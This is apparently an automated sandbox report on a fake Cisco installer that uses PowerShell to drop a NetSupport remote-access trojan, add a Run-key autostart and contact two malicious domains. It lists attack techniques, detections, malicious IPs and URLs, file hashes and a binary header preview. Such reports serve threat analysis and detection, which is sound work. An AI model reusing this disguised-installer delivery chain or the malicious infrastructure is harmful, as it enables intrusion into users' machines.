Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe | Code function: 6_2_1101D180 __time64,SetRect,GetLocalTime,6_2_1101D180
Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe | Code function: 6_2_1103B220 _calloc,GetUserNameA,_free,_calloc,_free,6_2_1103B220
Source: is-H5812.tmp.2.dr | Binary or memory string: r?IsOs_WIN_VISTA@@YA_NXZ
Source: is-2TJID.tmp.2.dr | Binary or memory string: ?GetOsVersion@@YA?AUMYOSVERSION@@XZ\?IsOs_MAC@@YA_NXZq?IsOs_WIN_8_Only@@YA_NXZ
Source: is-H5812.tmp.2.dr | Binary or memory string: ?DeleteUser@CProcessApi@@SAJQA_W@Zr?IsOs_WIN_VISTA@@YA_NXZvpncommon.dllIPathFileExistsWSHLWAPI.dll
Source: is-2TJID.tmp.2.dr | Binary or memory string: p?IsOs_WIN_8Point10_Only@@YA_NXZ
Source: is-2TJID.tmp.2.dr | Binary or memory string: ?MakeSureDirectoryPathExists@@YA_NPB_W@Zl?IsOs_WIN_7_Only@@YA_NXZi
Source: is-2TJID.tmp.2.dr | Binary or memory string: l?IsOs_WIN_7_Only@@YA_NXZ
Source: is-2TJID.tmp.2.dr | Binary or memory string: GetCurrentTimeSecondss?IsOs_WIN_VISTA_Only@@YA_NXZR
Source: is-2TJID.tmp.2.dr | Binary or memory string: ?CreateMultitonInstance@CExecutionContext@@SAJAAPAV1@W4INSTANCE_ID@1@@ZW?IsOs_LINUX@@YA_NXZp?IsOs_WIN_8Point10_Only@@YA_NXZ
Source: is-2TJID.tmp.2.dr | Binary or memory string: q?IsOs_WIN_8_Only@@YA_NXZ
Source: is-2TJID.tmp.2.dr | Binary or memory string: s?IsOs_WIN_VISTA_Only@@YA_NXZ
Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe | Code function: 6_2_1106F210 CapiHangup,CapiClose,CapiOpen,CapiListen,GetTickCount,GetTickCount,GetTickCount,CapiHangup,Sleep,GetTickCount,Sleep,6_2_1106F210
Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe | Code function: 6_2_688FA980 EnterCriticalSection,LeaveCriticalSection,LeaveCriticalSection,LeaveCriticalSection,WSAGetLastError,socket,WSAGetLastError,#21,#21,#21,bind,WSAGetLastError,closesocket,htons,WSASetBlockingHook,WSAGetLastError,WSAUnhookBlockingHook,closesocket,WSAGetLastError,WSAUnhookBlockingHook,closesocket,WSAUnhookBlockingHook,EnterCriticalSection,InitializeCriticalSection,getsockname,LeaveCriticalSection,GetTickCount,InterlockedExchange,6_2_688FA980
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 3412, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: client32.exe PID: 4176, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: client32.exe PID: 1112, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: client32.exe PID: 6484, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Roaming\Cisco\PCICHEK.DLL, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Roaming\Cisco\client32.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Roaming\Cisco\AudioCapture.dll, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Roaming\Cisco\TCCTL32.DLL, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Roaming\Cisco\HTCTL32.DLL, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Roaming\Cisco\pcicapi.dll, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Roaming\Cisco\PCICL32.DLL, type: DROPPED
Techniques listed per tactic, in the order the matrix shows them; a leading number is the number shown in that cell of the report.

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses; Network Security Appliances
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure; Domains
Initial Access: 2 Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise; Compromise Software Dependencies and Development Tools
Execution: 1 Windows Management Instrumentation; 3 Native API; 2 Command and Scripting Interpreter; 2 PowerShell; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell; AppleScript
Persistence: 1 DLL Side-Loading; 1 DLL Search Order Hijacking; 2 Valid Accounts; 11 Registry Run Keys / Startup Folder; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron; Launchd
Privilege Escalation: 1 DLL Side-Loading; 1 DLL Search Order Hijacking; 2 Valid Accounts; 21 Access Token Manipulation; 12 Process Injection; 11 Registry Run Keys / Startup Folder; Startup Items; Scheduled Task/Job; At; Cron; Launchd
Defense Evasion: 1 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 11 Software Packing; 1 DLL Side-Loading; 1 DLL Search Order Hijacking; 2 Masquerading; 2 Valid Accounts; 31 Virtualization/Sandbox Evasion; 21 Access Token Manipulation; 12 Process Injection; Stripped Payloads
Credential Access: 1 Network Sniffing; 1 Input Capture; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing; Input Capture
Discovery: 11 System Time Discovery; 1 Account Discovery; 1 System Service Discovery; 3 File and Directory Discovery; 1 Network Sniffing; 33 System Information Discovery; 151 Security Software Discovery; 2 Process Discovery; 31 Virtualization/Sandbox Evasion; 11 Application Window Discovery; 3 System Owner/User Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot; Software Deployment Tools
Collection: 11 Archive Collected Data; 1 Screen Capture; 1 Input Capture; 3 Clipboard Data; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging; Remote Data Staging
Command and Control: 1 Ingress Tool Transfer; 22 Encrypted Channel; 3 Non-Application Layer Protocol; 4 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols; Mail Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted Non-C2 Protocol
Impact: 1 System Shutdown/Reboot; 1 Defacement; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement; Firmware Corruption
Behavior Graph ID: 1546660, Sample: CiscoSetup.exe, Startdate: 01/11/2024, Architecture: WINDOWS, Score: 54

Signatures: Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); Sigma detected: Powershell drops NetSupport RAT client; 4 other signatures
Domains: payiki.com; anyhowdo.com; geo.netsupportsoftware.com

• CiscoSetup.exe (started)
    dropped: C:\Users\user\AppData\...\CiscoSetup.tmp, PE32
  • CiscoSetup.tmp (started)
      dropped: C:\Users\user\AppData\Local\...\cispn.ps1, ASCII
      dropped: C:\Program Files (x86)\Cisco\unins000.dat, InnoSetup
      dropped: C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+
      dropped: 96 other files (none is malicious)
      signature: Bypasses PowerShell execution policy
    • powershell.exe (started)
        dropped: C:\Users\user\AppData\...\remcmdstub.exe, PE32
        dropped: C:\Users\user\AppData\Roaming\...\pcicapi.dll, PE32
        dropped: C:\Users\user\AppData\...\client32.exe, PE32
        dropped: 7 other files (6 malicious)
        signature: Found suspicious powershell code related to unpacking or dynamic code loading
        signature: Loading BitLocker PowerShell Module
        signature: Powershell drops PE file
      • client32.exe (started)
          DNS/IP: anyhowdo.com 199.188.200.195, 443, 60707 NAMECHEAP-NETUS United States
          DNS/IP: payiki.com 151.236.16.15, 443, 60703 HVC-ASUS European Union
          DNS/IP: geo.netsupportsoftware.com 104.26.1.231, 60710, 80 CLOUDFLARENETUS United States
          signature: Contains functionalty to change the wallpaper
          signature: Contains functionality to detect sleep reduction / modifications
      • conhost.exe (started)
• client32.exe (started)
• client32.exe (started)

Source | Detection | Scanner | Label | Link
CiscoSetup.exe | 0% | ReversingLabs

Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Roaming\Cisco\AudioCapture.dll | 3% | ReversingLabs
                                  No Antivirus matches
                                  No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
payiki.com | 151.236.16.15 | true | true | | unknown
geo.netsupportsoftware.com | 104.26.1.231 | true | false | | unknown
anyhowdo.com | 199.188.200.195 | true | true | | unknown

Name | Malicious | Antivirus Detection | Reputation
http://151.236.16.15/fakeurl.htm | true | | unknown
http://geo.netsupportsoftware.com/location/loca.asp | false | | unknown
http://199.188.200.195/fakeurl.htm | true | | unknown
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          https://contoso.com/powershell.exe, 00000004.00000002.2425908561.00000000064A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          https://nuget.org/nuget.exepowershell.exe, 00000004.00000002.2425908561.00000000064A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          https://www.innosetup.com/CiscoSetup.exe, 00000000.00000003.2131548415.00000000035C0000.00000004.00001000.00020000.00000000.sdmp, CiscoSetup.exe, 00000000.00000003.2132065973.000000007F29B000.00000004.00001000.00020000.00000000.sdmp, CiscoSetup.tmp, 00000002.00000000.2133732042.0000000000C71000.00000020.00000001.01000000.00000004.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          https://sectigo.com/CPS0Dpowershell.exe, 00000004.00000002.2411285654.0000000004EF0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2411285654.0000000004F8A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            unknown
                                                                            http://www.netsupportschool.com/tutor-assistant.asp11(client32.exe, 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 00000009.00000002.2497690917.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2579319799.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpfalse
                                                                              unknown
                                                                              https://www.iminunet.comParaCiscoSetup.tmp, 00000002.00000003.2522959977.0000000005750000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                unknown
                                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000004.00000002.2411285654.0000000004A41000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                http://www.netsupportschool.com/tutor-assistant.aspclient32.exe, 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 00000009.00000002.2497690917.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2579319799.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpfalse
                                                                                  unknown
                                                                                  https://www.cisco.comCiscoSetup.exe, 00000000.00000003.2546263258.0000000003123000.00000004.00001000.00020000.00000000.sdmp, CiscoSetup.tmp, 00000002.00000003.2535098758.0000000002CAC000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                    unknown
                                                                                    http://geo.netsupportsoftware.com/location/loca.aspnclient32.exe, 00000006.00000003.2415445587.00000000050AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      unknown
                                                                                      http://nuget.org/NuGet.exepowershell.exe, 00000004.00000002.2425908561.00000000064A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      http://www.cisco.com/c/en/us/td/docs/security/vpn_client/anyconnect/anyconnect40/user/guide/b_Androiis-V7509.tmp.2.drfalse
                                                                                        unknown
                                                                                        http://www.pci.co.uk/supportclient32.exe, 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 00000009.00000002.2497690917.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2579319799.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpfalse
                                                                                          unknown
                                                                                          https://sectigo.com/CPS0powershell.exe, 00000004.00000002.2411285654.0000000004EF0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2411285654.0000000004F8A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          unknown
                                                                                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000004.00000002.2411285654.0000000004B96000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          unknown
                                                                                          https://curl.se/docs/http-cookies.htmlis-2J155.tmp.2.drfalse
                                                                                            unknown
                                                                                            http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000004.00000002.2411285654.0000000004B96000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2411285654.00000000053B3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            unknown
                                                                                            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000004.00000002.2411285654.0000000004B96000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              unknown
                                                                                              http://ocsp.thawte.com0powershell.exe, 00000004.00000002.2411285654.0000000004EF0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2411285654.0000000004EE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2411285654.0000000004F8A000.00000004.00000800.00020000.00000000.sdmp, client32.exe.4.drfalse
                                                                                              • URL Reputation: safe
                                                                                              unknown
                                                                                              https://www.immunet.com.CiscoSetup.tmp, 00000002.00000003.2522959977.0000000005750000.00000004.00001000.00020000.00000000.sdmp, is-KOKH0.tmp.2.dr, is-KCJJQ.tmp.2.drfalse
                                                                                                unknown
                                                                                                https://contoso.com/Iconpowershell.exe, 00000004.00000002.2425908561.00000000064A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                unknown
                                                                                                http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#powershell.exe, 00000004.00000002.2411285654.0000000004F8A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                unknown
                                                                                                https://www.cisco.com/updateCiscoSetup.exe, 00000000.00000003.2546263258.0000000003131000.00000004.00001000.00020000.00000000.sdmp, CiscoSetup.tmp, 00000002.00000003.2535098758.0000000002CC1000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                  unknown
                                                                                                  http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0spowershell.exe, 00000004.00000002.2411285654.0000000004EF0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  unknown
                                                                                                  http://www.microsoft.powershell.exe, 00000004.00000002.2457352280.00000000074C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  unknown
                                                                                                  https://curl.se/docs/alt-svc.htmlis-2J155.tmp.2.drfalse
                                                                                                    unknown
                                                                                                    http://127.0.0.1client32.exe, client32.exe, 00000009.00000002.2497655081.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2579273114.000000001118F000.00000002.00000001.01000000.0000000B.sdmpfalse
                                                                                                      unknown
                                                                                                      https://www.immunet.comAbyCiscoSetup.tmp, 00000002.00000003.2522959977.0000000005750000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                        unknown
                                                                                                        http://www.symauth.com/cps0(powershell.exe, 00000004.00000002.2411285654.0000000004F8A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2411285654.0000000005089000.00000004.00000800.00020000.00000000.sdmp, PCICHEK.DLL.4.drfalse
                                                                                                        • URL Reputation: safe
                                                                                                        unknown
                                                                                                        https://github.com/Pester/Pesterpowershell.exe, 00000004.00000002.2411285654.0000000004B96000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          unknown
                                                                                                          http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0tpowershell.exe, 00000004.00000002.2411285654.0000000004EF0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2411285654.0000000004F8A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          unknown
                                                                                                          https://curl.se/docs/copyright.htmlDis-2J155.tmp.2.drfalse
                                                                                                            unknown
                                                                                                            http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0ypowershell.exe, 00000004.00000002.2411285654.0000000004F8A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            http://www.symauth.com/rpa00powershell.exe, 00000004.00000002.2411285654.0000000004F8A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2411285654.0000000005089000.00000004.00000800.00020000.00000000.sdmp, PCICHEK.DLL.4.drfalse
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            https://www.iminunet.comCiscoSetup.tmp, 00000002.00000003.2522959977.0000000005750000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                              unknown
                                                                                                              https://www.immunet.comis-707KS.tmp.2.dr, is-V7509.tmp.2.drfalse
                                                                                                                unknown
                                                                                                                http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#powershell.exe, 00000004.00000002.2411285654.0000000004EF0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2411285654.0000000004F8A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                unknown
                                                                                                                http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000004.00000002.2411285654.0000000004B96000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2411285654.00000000053B3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                unknown
                                                                                                                http://www.cisco.com0is-KLEUG.tmp.2.dr, is-2J155.tmp.2.dr, is-I704D.tmp.2.dr, is-VTDA9.tmp.2.dr, is-V8S0O.tmp.2.dr, is-S9VDU.tmp.2.dr, is-2TJID.tmp.2.dr, is-SINFC.tmp.2.dr, is-H5812.tmp.2.drfalse
                                                                                                                  unknown
                                                                                                                  http://relaxng.org/ns/structure/1.0is-2TJID.tmp.2.drfalse
                                                                                                                    unknown
                                                                                                                    https://www.cisco.com/supportQyCiscoSetup.tmp, 00000002.00000003.2535098758.0000000002CC1000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                      unknown
                                                                                                                      https://www.cisco.com/supportCiscoSetup.exe, 00000000.00000003.2546263258.0000000003131000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                        unknown
                                                                                                                        https://curl.se/Vis-2J155.tmp.2.drfalse
                                                                                                                          unknown
IP | Domain | Country | ASN | ASN Name | Malicious
104.26.1.231 | geo.netsupportsoftware.com | United States | 13335 | CLOUDFLARENETUS | false
151.236.16.15 | payiki.com | European Union | 29802 | HVC-ASUS | true
199.188.200.195 | anyhowdo.com | United States | 22612 | NAMECHEAP-NETUS | true
                                                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                                                          Analysis ID:1546660
                                                                                                                          Start date and time:2024-11-01 12:10:11 +01:00
                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                          Overall analysis duration:0h 12m 3s
                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                          Report type:full
                                                                                                                          Cookbook file name:default.jbs
                                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                          Number of analysed new started processes analysed:12
                                                                                                                          Number of new started drivers analysed:0
                                                                                                                          Number of existing processes analysed:0
                                                                                                                          Number of existing drivers analysed:0
                                                                                                                          Number of injected processes analysed:0
                                                                                                                          Technologies:
                                                                                                                          • HCA enabled
                                                                                                                          • EGA enabled
                                                                                                                          • AMSI enabled
                                                                                                                          Analysis Mode:default
                                                                                                                          Analysis stop reason:Timeout
                                                                                                                          Sample name:CiscoSetup.exe
                                                                                                                          Detection:MAL
                                                                                                                          Classification:mal54.rans.troj.evad.winEXE@10/537@3/3
                                                                                                                          EGA Information:
                                                                                                                          • Successful, ratio: 66.7%
                                                                                                                          HCA Information:
                                                                                                                          • Successful, ratio: 72%
                                                                                                                          • Number of executed functions: 191
                                                                                                                          • Number of non-executed functions: 219
                                                                                                                          Cookbook Comments:
                                                                                                                          • Found application associated with file extension: .exe
                                                                                                                          • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                                                          • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                          • Execution Graph export aborted for target powershell.exe, PID 3412 because it is empty
                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                          • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                          • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                          • VT rate limit hit for: CiscoSetup.exe
Time | Type | Description
07:11:27 | API Interceptor | 19x Sleep call for process: powershell.exe modified
07:12:01 | API Interceptor | 15383830x Sleep call for process: client32.exe modified
12:11:30 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run MyApp C:\Users\user\AppData\Roaming\Cisco\client32.exe
12:11:39 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run MyApp C:\Users\user\AppData\Roaming\Cisco\client32.exe
Process: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 4467816
Entropy (8bit): 6.598146073323608
Encrypted: false
SSDEEP: 98304:+QCnFew3oMj8NiqvOE41lDJO2Gi3VjGClUjtbnaC:+TeOLECDJrpVSZbL
MD5: 03615EEF106C5E54C5279B05A9686B9A
SHA1: 621C9AB49367298751EAAB0E0A29575327041729
SHA-256: 7B6826DD31DB6E559BBF873DE756292B22B910F319C6C4B09D7A62A5312A4AC3
SHA-512: BFB2ADE2B66B7CCD3E1CB9FCFAD2AF8D35BD12E063ECC1D388958C5A66776CC865CDD25B72B3786011C388C9A3FF730DAF5F97D58923829DA9DBC76AD393FCE8
Malicious: false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: , Detection: malicious
• Filename: SecureClientInstaller.exe, Detection: malicious
• Filename: SecureClientInstaller.exe, Detection: malicious
Reputation: low
                                                                                                                                      Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........d..............n.......n..q....jf......p.......p.......p.......n.......l...............p..Q....n..........p...|p..s...|pd.............|p......Rich....................PE..L......d..................)...................)...@..........................`D......YD...@...................................8.T.....:.X.............C.hH... B..6..0.6.T.....................6.......6.@.............)..............................text.....).......)................. ..`.rdata..fd....)..f....).............@..@.data.........9.......8.............@....rsrc...X.....:.. ....9.............@..@.reloc...6... B..8....A.............@..B................................................................................................................................................................................................................................................................
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
